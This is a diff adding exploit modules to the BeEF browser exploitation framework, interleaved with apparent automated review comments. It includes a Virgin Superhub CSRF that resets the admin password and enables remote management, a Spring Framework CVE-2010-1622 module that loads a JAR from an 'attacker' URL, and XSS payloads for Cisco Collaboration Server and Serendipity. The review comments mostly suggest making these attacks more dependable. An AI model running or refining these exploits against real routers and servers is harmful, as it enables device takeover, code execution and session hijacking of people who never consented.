+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+ var port = '<%= @port %>';
+
+ var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+ {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
+ {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+ ]);
+
+ var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+ {'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+ ]);
+
+ var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+ {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
+ {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(virgin_superhub_iframe1);
+ document.body.removeChild(virgin_superhub_iframe2);
+ document.body.removeChild(virgin_superhub_iframe3);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
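Review bot: The three forms at `goform/RgSecurity`, `goform/RgServices` and `goform/RgVMRemoteManagementRes` appear to be submitted concurrently, so the admin-password change can land before or after the remote-management and port-scan-detection posts; if the hub ties its session to the credentials the later requests may be rejected, and the module reports `exploit attempted` regardless of which order won. Chaining them — submitting the next `createIframeXsrfForm` from the previous iframe's `onload` — would make the outcome deterministic; whether the Superhub invalidates sessions on password change I cannot confirm from here. `passwd` and `port` are also interpolated into single-quoted literals unescaped, and `cleanup` is an implicit global shared with the other new modules, so `setTimeout(function() { /* removeChild x3 */ }, 15000);` would be the safer shape.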
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
new file mode 100644
index 000000000..e767d9fef
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ virgin_superhub_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Virgin Superhub CSRF"
+ description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
+ authors: ["bcoles", "n0x00"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
new file mode 100644
index 000000000..83599490c
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Virgin_superhub_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
+ {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
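Review bot: The `base` default `'http://192.168.100.1/'` carries a trailing slash that the command script relies on by concatenating `goform/...` directly onto it, so an operator who trims the slash silently posts to `http://192.168.100.1goform/RgSecurity`; nothing in the option tells them this. The label should state the contract: `{'name' => 'base', 'ui_label' => 'Router web root (must end with /)', 'value' => 'http://192.168.100.1/'},`. Alternatively the script could normalise the slash, but then the two sides must be changed together.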
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
new file mode 100644
index 000000000..00804c652
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ jar_file = "<%= @jar_file %>";
+ form_controller = "<%= @form_controller %>";
+
+ uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+ var spring_iframe = beef.dom.createInvisibleIframe();
+ spring_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(spring_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
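Review bot: `jar_file`, `form_controller` and `uri` are assigned without `var`, so they become globals on the hooked page and can clobber (or be clobbered by) variables the page already defines — `uri` in particular is a common name. Declaring them locally is a three-line change: `var jar_file = "<%= @jar_file %>";`, `var form_controller = "<%= @form_controller %>";`, `var uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;`. The `class.classLoader.URLs[0]` parameter is appended as raw text; if the form controller URL already carries a query string the `?` here produces a malformed URL, which is worth a comment or an `indexOf('?')` check. `cleanup` is likewise an implicit global invoked via a string `setTimeout`, as in the other modules added here.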
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
new file mode 100644
index 000000000..1dbaace8f
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ spring_framework_malicious_jar:
+ enable: true
+ category: "Exploits"
+ name: "Spring Framework Malicious Jar Exploit"
+ description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/
Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)"
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
new file mode 100644
index 000000000..f1777b7f5
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Spring_framework_malicious_jar < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
+ {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
new file mode 100644
index 000000000..81933f79a
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
+ cisco_collaboration_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
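Review bot: The escaping at `var uri = '<%= @uri.gsub(/'/, "\\'") %>';` does not do what it intends: in a Ruby `gsub` replacement string `\'` is the special post-match reference, so every `'` in the URI is replaced by the text that follows it rather than by `\'`, corrupting the payload instead of escaping it. Using the block form avoids backreference interpretation and keeps the backslash literal: `var uri = '<%= @uri.gsub("'") { "\\'" } %>';`. A trailing backslash in the URI would still escape the closing quote, so backslashes should be doubled first if the option is meant to take arbitrary input.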
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
new file mode 100644
index 000000000..3320a74f6
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ cisco_collaboration_server_5_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Cisco Collaboration Server 5 XSS"
+ description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/"
+ authors: ["bcoles", "s4squatch"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
new file mode 100644
index 000000000..f0e42f7df
--- /dev/null
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Cisco_collaboration_server_5_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
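Review bot: `hook_uri` in `self.options` is built from `BeEF::Core::Configuration.instance` but never read, so both the `configuration` and `hook_uri` lines are dead code; either drop them or use the value in the option's default. The same unused local is present in `modules/exploits/xss/serendipity_1.6_xss/module.rb` added by this commit. The explicit `return` in front of the array literal is also unnecessary in Ruby, since the array is already the method's last expression.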
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
new file mode 100644
index 000000000..a20ff5bbb
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var serendipity_iframe = beef.dom.createInvisibleIframe();
+ serendipity_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
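Review bot: The `gsub` in `var uri = '<%= @uri.gsub(/'/, "\\'") %>';` escapes only single quotes, so a `uri` option containing a backslash or a line break still yields a malformed string literal and the whole `beef.execute` callback fails to parse. Emitting the value as a JSON string literal instead, `var uri = <%= @uri.to_json %>;` (assuming the `json` library is available in the template context — confirm), handles quotes, backslashes and control characters in one step. The same pattern is in `modules/exploits/xss/cisco_collaboration_server_5_xss/command.js` added by this commit. Separately, `beef.net.send(..., "result=exploit attempted")` runs synchronously right after `setAttribute('src', uri)`, so it only confirms the iframe was created, not that anything loaded; a comment such as `// reports creation of the iframe only; the load outcome is not observed` would keep later readers from treating it as a success signal.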
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
new file mode 100644
index 000000000..96d9e9bb2
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ serendipity_1_6_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Serendipity <= 1.6 XSS"
+ description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/"
+ authors: ["bcoles", "Stefan Schurtz"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
new file mode 100644
index 000000000..cf46a83d1
--- /dev/null
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Serendipity_1_6_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'}
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index 3ae083e7a..eaf9a25f5 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -18,7 +18,7 @@ beef:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
- name: "Zenoss Add User CSRF"
+ name: "Zenoss <= 3.2.1 Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
index 9249f7d99..923946d5d 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -18,7 +18,7 @@ beef:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
- name: "Zenoss Daemon CSRF"
+ name: "Zenoss <= 3.2.1 Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index 4a0d23f18..ba611bf45 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -24,5 +24,5 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["ALL"]
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 802db1695..7902a2381 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone", "Macintosh"]
+ os: ["iOS", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 0033717ba..56c276653 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["All"]
user_notify: ["FF", "C"]
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d3bb15769..783637ed4 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
user_notify:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
index 4c44194e1..d6b2c0be4 100644
--- a/modules/misc/local_file_theft/config.yaml
+++ b/modules/misc/local_file_theft/config.yaml
@@ -23,7 +23,7 @@ beef:
enable: true
category: "Misc"
name: "Local File Theft"
- description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
+ description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system."
authors: ["mh"]
target:
- working: ["All"]
+ working: ["S"]
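Review bot: The reworded `description` on the new lines keeps the spelling errors of the old text — `snaches`, `plagurised` and `from the your localfile system`; since the line is being rewritten anyway, `snatches`, `plagiarised` and `from your local filesystem` would fix them. The `working` target narrowed to `["S"]` is consistent with the Safari-only test instructions in the description.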
diff --git a/update-beef b/update-beef
new file mode 100755
index 000000000..4524a540f
--- /dev/null
+++ b/update-beef
@@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+echo Updating...
+git pull
\ No newline at end of file
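Review bot: `git pull` on the last line runs in whatever directory the caller is in, not in the checkout that contains `update-beef`, so invoking the script by path from elsewhere updates the wrong repository or fails with a not-a-git-repository error. Changing to the script's own directory first, `cd "$(dirname "$0")" || exit 1`, and adding `set -e` after the shebang so a failed pull does not exit 0, makes the script location-independent. The file also lacks a trailing newline.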